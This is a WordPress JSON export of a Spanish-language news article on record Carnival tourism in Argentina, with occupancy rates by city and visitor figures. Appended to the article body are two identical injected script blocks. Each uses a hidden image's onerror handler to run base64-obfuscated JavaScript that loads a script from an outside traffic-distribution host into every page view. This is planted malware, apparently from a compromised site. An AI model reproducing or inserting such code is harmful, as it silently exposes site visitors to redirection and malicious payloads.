{"id":4903,"date":"2025-03-05T08:41:08","date_gmt":"2025-03-05T11:41:08","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4903"},"modified":"2025-08-13T23:39:28","modified_gmt":"2025-08-14T02:39:28","slug":"carnaval-importante-movimiento-turistico-en-todo-el-pais","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4903","title":{"rendered":"Carnaval: importante movimiento tur\u00edstico en todo el pa\u00eds"},"content":{"rendered":"\n<h5 class=\"wp-block-heading\"><em>El primer fin de semana extralargo del a\u00f1o gener\u00f3 m\u00e1s de 700.000 millones de pesos y moviliz\u00f3 2,8 millones de turistas, un 7,6 por ciento m\u00e1s que en 2024.<\/em><\/h5>\n\n\n\n<p>En el fin de semana extralargo de Carnaval viajaron por el pa\u00eds&nbsp;<strong>2.8 millones de turistas<\/strong>, lo que representa un incremento del&nbsp;<strong>7,6 por ciento<\/strong>&nbsp;respecto al a\u00f1o anterior. El impacto econ\u00f3mico fue de&nbsp;<strong>701.064 millones de pesos<\/strong>, seg\u00fan informaci\u00f3n de la Confederaci\u00f3n Argentina de la Mediana Empresa (CAME).<\/p>\n\n\n\n<p>Asimismo, el relevamiento del Observatorio Argentino de Turismo de la C\u00e1mara Argentina de Turismo (CAT) indica un&nbsp;<strong>importante movimiento tur\u00edstico<\/strong>&nbsp;con n\u00fameros positivos en la mayor\u00eda de las ciudades.<\/p>\n\n\n\n<p>Los destinos m\u00e1s elegidos por tradici\u00f3n para esta celebraci\u00f3n -Corrientes, Entre R\u00edos y Jujuy- registraron una gran concurrencia en sus festejos, siendo los m\u00e1s visitados la ciudad de&nbsp;<strong>Corrientes<\/strong>, con&nbsp;<strong>95 por ciento<\/strong>;&nbsp;<strong>Gualeguaych\u00fa<\/strong>, en Entre R\u00edos, con&nbsp;<strong>83 por ciento<\/strong>; y con&nbsp;<strong>94 por ciento<\/strong>&nbsp;la&nbsp;<strong>Quebrada<\/strong>&nbsp;y los&nbsp;<strong>Valles<\/strong>&nbsp;de Jujuy, provincia que bati\u00f3 un r\u00e9cord de turistas con m\u00e1s de&nbsp;<strong>48.000 visitantes<\/strong>.<\/p>\n\n\n\n<p>En Salta,&nbsp;<strong>Cafayate<\/strong>&nbsp;tuvo un promedio del&nbsp;<strong>85 por ciento<\/strong>&nbsp;con establecimientos al m\u00e1ximo de su capacidad. En Tucum\u00e1n, las ciudades m\u00e1s elegidas fueron&nbsp;<strong>Taf\u00ed Viejo<\/strong>, con&nbsp;<strong>95 por ciento<\/strong>; y&nbsp;<strong>San Javier<\/strong>&nbsp;y&nbsp;<strong>El Cadillal<\/strong>&nbsp;con&nbsp;<strong>90 por ciento<\/strong>&nbsp;ambas.<\/p>\n\n\n\n<p>En la regi\u00f3n de Cuyo destacaron las localidades mendocinas de&nbsp;<strong>San Rafael<\/strong>&nbsp;y&nbsp;<strong>Potrerillos<\/strong>&nbsp;con el&nbsp;<strong>97 y 92 por ciento<\/strong>, respectivamente, mientras que San Juan registr\u00f3 un&nbsp;<strong>90 por ciento<\/strong>&nbsp;en&nbsp;<strong>Calingasta<\/strong>. En San Luis, la localidad de&nbsp;<strong>La Carolina<\/strong>&nbsp;-distinguida entre las mejores del mundo por ONU Turismo en 2023- lleg\u00f3 al&nbsp;<strong>100 por ciento<\/strong>.<\/p>\n\n\n\n<p>Misiones tuvo un promedio provincial del 80 por ciento, llegando al&nbsp;<strong>90 por ciento<\/strong>&nbsp;en&nbsp;<strong>Puerto Iguaz\u00fa<\/strong>. En la provincia de C\u00f3rdoba,&nbsp;<strong>Villa Carlos Paz<\/strong>&nbsp;registr\u00f3 un&nbsp;<strong>86 por ciento<\/strong>, y&nbsp;<strong>Santa Rosa de Calamuchita<\/strong>, un&nbsp;<strong>85 por ciento<\/strong>. La ciudad de&nbsp;<strong>Mar del Plata<\/strong>&nbsp;alcanz\u00f3 una ocupaci\u00f3n del&nbsp;<strong>70 por ciento<\/strong>, coincidiendo con el cierre de la temporada de playas.<\/p>\n\n\n\n<p>En la Patagonia,&nbsp;<strong>Las Grutas y Bariloche<\/strong>&nbsp;(R\u00edo Negro) superaron el&nbsp;<strong>80 por ciento<\/strong>, y las localidades de&nbsp;<strong>Caviahue, Copahue y Villa Traful<\/strong>&nbsp;en Neuqu\u00e9n, rondaron el&nbsp;<strong>70 por ciento<\/strong>&nbsp;el fin de semana largo, acompa\u00f1adas de diversas fiestas provinciales.<\/p>\n\n\n\n<p>En cuanto a la movilidad,&nbsp;<strong>Aerol\u00edneas Argentinas<\/strong>&nbsp;inform\u00f3 que transport\u00f3 m\u00e1s de&nbsp;<strong>226.000 pasajeros<\/strong>&nbsp;durante este fin de semana con Bariloche, Iguaz\u00fa, Mendoza, C\u00f3rdoba, Salta, Neuqu\u00e9n y Tucum\u00e1n como destinos m\u00e1s elegidos para viajar.<\/p>\n\n\n\n<p><strong>AUBASA<\/strong>&nbsp;(Autopistas de Buenos Aires) comunic\u00f3 un intenso tr\u00e1nsito vehicular en el inicio del fin de semana extralargo en las rutas 2 y 11 en sentido hacia los diversos destinos tur\u00edsticos de la Costa Atl\u00e1ntica bonaerense -La Costa, Pinamar, Villa Gesell y Mar Chiquita- con registros promedio de&nbsp;<strong>2.000 veh\u00edculos por hora<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/profiles\/argentinagobar\/themes\/argentinagobar\/argentinagobar_theme\/logo_argentina-azul.svg\" alt=\"\" style=\"width:298px;height:auto\"\/><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El primer fin de semana extralargo del a\u00f1o gener\u00f3 m\u00e1s de 700.000 millones de pesos y moviliz\u00f3 2,8 millones de turistas, un 7,6 por ciento m\u00e1s que en 2024. En el fin de semana extralargo de Carnaval viajaron por el pa\u00eds&nbsp;2.8 millones de turistas, lo que representa un incremento del&nbsp;7,6 por ciento&nbsp;respecto al a\u00f1o anterior. [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4904,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[21],"tags":[],"class_list":{"0":"post-4903","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4903"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4903"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4903\/revisions"}],"predecessor-version":[{"id":6557,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4903\/revisions\/6557"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4904"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4903"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4903"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4903"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}